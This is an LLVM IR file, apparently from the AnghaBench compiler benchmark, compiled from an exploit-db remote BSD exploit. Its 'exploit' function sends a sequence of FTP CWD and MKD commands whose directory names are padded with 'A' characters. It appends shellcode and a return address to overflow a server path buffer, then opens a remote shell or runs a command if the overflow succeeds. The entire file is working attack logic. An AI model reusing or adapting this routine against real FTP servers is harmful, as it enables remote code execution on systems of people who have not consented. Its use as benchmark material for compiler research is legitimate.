; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/bsd/remote/extr_234.c_exploit.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/bsd/remote/extr_234.c_exploit.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [4 x i8] c"CWD\00", align 1
@write_dir = common dso_local global i8* null, align 8
@.str.1 = private unnamed_addr constant [23 x i8] c"Can't CWD to write_dir\00", align 1
@.str.2 = private unnamed_addr constant [2 x i8] c"A\00", align 1
@.str.3 = private unnamed_addr constant [4 x i8] c"MKD\00", align 1
@.str.4 = private unnamed_addr constant [26 x i8] c"Can't change to directory\00", align 1
@heavenlycode = common dso_local global i8* null, align 8
@ret_addr = common dso_local global i32 0, align 4
@.str.5 = private unnamed_addr constant [5 x i8] c"AAA\22\00", align 1
@.str.6 = private unnamed_addr constant [4 x i8] c"PWD\00", align 1
@command = common dso_local global i32* null, align 8
@stderr = common dso_local global i32 0, align 4
@.str.7 = private unnamed_addr constant [16 x i8] c"Exploit failed\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @exploit(i32 %0) #0 {
  %2 = alloca i32, align 4
  %3 = alloca [1024 x i8], align 16
  %4 = alloca i32, align 4
  %5 = alloca i8*, align 8
  store i32 %0, i32* %2, align 4
  store i8* null, i8** %5, align 8
  %6 = load i32, i32* %2, align 4
  %7 = load i8*, i8** @write_dir, align 8
  %8 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %9 = call i32 @ftp_cmd_err(i32 %6, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i64 0, i64 0), i8* %7, i8* %8, i32 1024, i8* getelementptr inbounds ([23 x i8], [23 x i8]* @.str.1, i64 0, i64 0))
  %10 = load i8*, i8** %5, align 8
  %11 = load i8*, i8** @write_dir, align 8
  %12 = call i32 @strlen(i8* %11)
  %13 = sub nsw i32 255, %12
  %14 = call i8* @strcreat(i8* %10, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.2, i64 0, i64 0), i32 %13)
  store i8* %14, i8** %5, align 8
  %15 = load i32, i32* %2, align 4
  %16 = load i8*, i8** %5, align 8
  %17 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %18 = call i32 @ftp_cmd_err(i32 %15, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.3, i64 0, i64 0), i8* %16, i8* %17, i32 1024, i8* null)
  %19 = load i32, i32* %2, align 4
  %20 = load i8*, i8** %5, align 8
  %21 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %22 = call i32 @ftp_cmd_err(i32 %19, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i64 0, i64 0), i8* %20, i8* %21, i32 1024, i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.4, i64 0, i64 0))
  %23 = call i32 @xfree(i8** %5)
  %24 = load i8*, i8** %5, align 8
  %25 = call i8* @strcreat(i8* %24, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.2, i64 0, i64 0), i32 255)
  store i8* %25, i8** %5, align 8
  %26 = load i32, i32* %2, align 4
  %27 = load i8*, i8** %5, align 8
  %28 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %29 = call i32 @ftp_cmd_err(i32 %26, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.3, i64 0, i64 0), i8* %27, i8* %28, i32 1024, i8* null)
  %30 = load i32, i32* %2, align 4
  %31 = load i8*, i8** %5, align 8
  %32 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %33 = call i32 @ftp_cmd_err(i32 %30, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i64 0, i64 0), i8* %31, i8* %32, i32 1024, i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.4, i64 0, i64 0))
  %34 = call i32 @xfree(i8** %5)
  %35 = load i8*, i8** @heavenlycode, align 8
  %36 = call i32 @strlen(i8* %35)
  store i32 %36, i32* %4, align 4
  %37 = load i8*, i8** %5, align 8
  %38 = load i32, i32* %4, align 4
  %39 = sub nsw i32 254, %38
  %40 = call i8* @strcreat(i8* %37, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.2, i64 0, i64 0), i32 %39)
  store i8* %40, i8** %5, align 8
  %41 = load i8*, i8** %5, align 8
  %42 = load i8*, i8** @heavenlycode, align 8
  %43 = call i8* @strcreat(i8* %41, i8* %42, i32 1)
  store i8* %43, i8** %5, align 8
  %44 = load i32, i32* %2, align 4
  %45 = load i8*, i8** %5, align 8
  %46 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %47 = call i32 @ftp_cmd_err(i32 %44, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.3, i64 0, i64 0), i8* %45, i8* %46, i32 1024, i8* null)
  %48 = load i32, i32* %2, align 4
  %49 = load i8*, i8** %5, align 8
  %50 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %51 = call i32 @ftp_cmd_err(i32 %48, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i64 0, i64 0), i8* %49, i8* %50, i32 1024, i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.4, i64 0, i64 0))
  %52 = call i32 @xfree(i8** %5)
  %53 = load i8*, i8** %5, align 8
  %54 = load i32, i32* @ret_addr, align 4
  %55 = call i8* @longToChar(i32 %54)
  %56 = call i8* @strcreat(i8* %53, i8* %55, i32 63)
  store i8* %56, i8** %5, align 8
  %57 = load i32, i32* %2, align 4
  %58 = load i8*, i8** %5, align 8
  %59 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %60 = call i32 @ftp_cmd_err(i32 %57, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.3, i64 0, i64 0), i8* %58, i8* %59, i32 1024, i8* null)
  %61 = load i32, i32* %2, align 4
  %62 = load i8*, i8** %5, align 8
  %63 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %64 = call i32 @ftp_cmd_err(i32 %61, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i64 0, i64 0), i8* %62, i8* %63, i32 1024, i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.4, i64 0, i64 0))
  %65 = call i32 @xfree(i8** %5)
  %66 = load i8*, i8** %5, align 8
  %67 = call i8* @strcreat(i8* %66, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.5, i64 0, i64 0), i32 1)
  store i8* %67, i8** %5, align 8
  %68 = load i32, i32* %2, align 4
  %69 = load i8*, i8** %5, align 8
  %70 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %71 = call i32 @ftp_cmd_err(i32 %68, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.3, i64 0, i64 0), i8* %69, i8* %70, i32 1024, i8* null)
  %72 = load i32, i32* %2, align 4
  %73 = load i8*, i8** %5, align 8
  %74 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %75 = call i32 @ftp_cmd_err(i32 %72, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i64 0, i64 0), i8* %73, i8* %74, i32 1024, i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.4, i64 0, i64 0))
  %76 = call i32 @xfree(i8** %5)
  %77 = load i32, i32* %2, align 4
  %78 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %79 = call i32 @ftp_cmd_err(i32 %77, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.6, i64 0, i64 0), i8* null, i8* %78, i32 1024, i8* null)
  %80 = load i32, i32* %2, align 4
  %81 = call i32 @exploit_ok(i32 %80)
  %82 = icmp ne i32 %81, 0
  br i1 %82, label %92, label %83

83:                                               ; preds = %1
  %84 = load i32*, i32** @command, align 8
  %85 = icmp ne i32* %84, null
  br i1 %85, label %86, label %88

86:                                               ; preds = %83
  %87 = call i32 @exit(i32 2) #3
  unreachable

88:                                               ; preds = %83
  %89 = load i32, i32* @stderr, align 4
  %90 = call i32 @fprintf(i32 %89, i8* getelementptr inbounds ([16 x i8], [16 x i8]* @.str.7, i64 0, i64 0))
  %91 = call i32 @exit(i32 1) #3
  unreachable

92:                                               ; preds = %1
  %93 = load i32*, i32** @command, align 8
  %94 = icmp eq i32* %93, null
  br i1 %94, label %95, label %98

95:                                               ; preds = %92
  %96 = load i32, i32* %2, align 4
  %97 = call i32 @shell(i32 %96)
  br label %101

98:                                               ; preds = %92
  %99 = load i32, i32* %2, align 4
  %100 = call i32 @do_command(i32 %99)
  br label %101

101:                                              ; preds = %98, %95
  ret void
}

declare dso_local i32 @ftp_cmd_err(i32, i8*, i8*, i8*, i32, i8*) #1

declare dso_local i8* @strcreat(i8*, i8*, i32) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @xfree(i8**) #1

declare dso_local i8* @longToChar(i32) #1

declare dso_local i32 @exploit_ok(i32) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @fprintf(i32, i8*) #1

declare dso_local i32 @shell(i32) #1

declare dso_local i32 @do_command(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
